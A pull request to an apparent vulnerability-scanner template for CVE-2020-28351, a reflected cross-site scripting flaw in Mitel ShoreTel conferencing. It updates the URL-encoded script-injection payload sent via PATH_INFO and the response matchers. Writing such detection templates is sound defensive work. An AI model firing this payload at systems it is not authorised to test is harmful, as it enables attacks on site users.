### PR TITLE
fix: CVE-2020-28351 template

### DIFF
--- a/cves/2020/CVE-2020-28351.yaml
+++ b/cves/2020/CVE-2020-28351.yaml
@@ -5,38 +5,48 @@ info:
   author: pikpikcu
   severity: medium
   description: Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING& page.
+  remediation: |
+    Apply the latest security patches or updates provided by Mitel to mitigate the XSS vulnerability.
   reference:
     - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html
     - https://www.mitel.com/articles/what-happened-shoretel-products
     - https://nvd.nist.gov/vuln/detail/CVE-2020-28351
+    - http://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html
+    - https://github.com/dievus/cve-2020-28351
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-28351
     cwe-id: CWE-79
+    epss-score: 0.0036
+    epss-percentile: 0.68696
+    cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: mitel
+    product: shoretel_firmware
   tags: packetstorm,cve,cve2020,shoretel,xss
 
-requests:
+http:
   - method: GET
     path:
-      - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"
+      - "{{BaseURL}}/index.php/%3C/script%3E%3Cscript%3Edocument.write('averyrandomstring<br>')%3C/script%3E?page=HOME%22"
+
     headers:
       Content-Type: application/x-www-form-urlencoded
 
     matchers-condition: and
     matchers:
-      - type: word
-        words:
-          - '</script><script>alert(document.domain)</script>'
+      - type: regex
         part: body
+        regex:
+          - 'averyrandomstring\n'
 
       - type: word
+        part: header
         words:
           - 'Content-Type: text/html'
-        part: header
 
       - type: status
         status:
           - 200
-
-# Enhanced by mp on 2022/08/15


### PR DESCRIPTION
### Template / PR Information

- Fixed CVE-2020-28351

Use a script payload that writes a string to the body of the page. This way we can avoid FPs caused by the <script> chunk being injected in parts where it wouldn't cause an XSS. (for example in a string inside of a meta tag). To validate the XSS was succesfull we need to find that string inside the body of the page followed by a newline character.

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO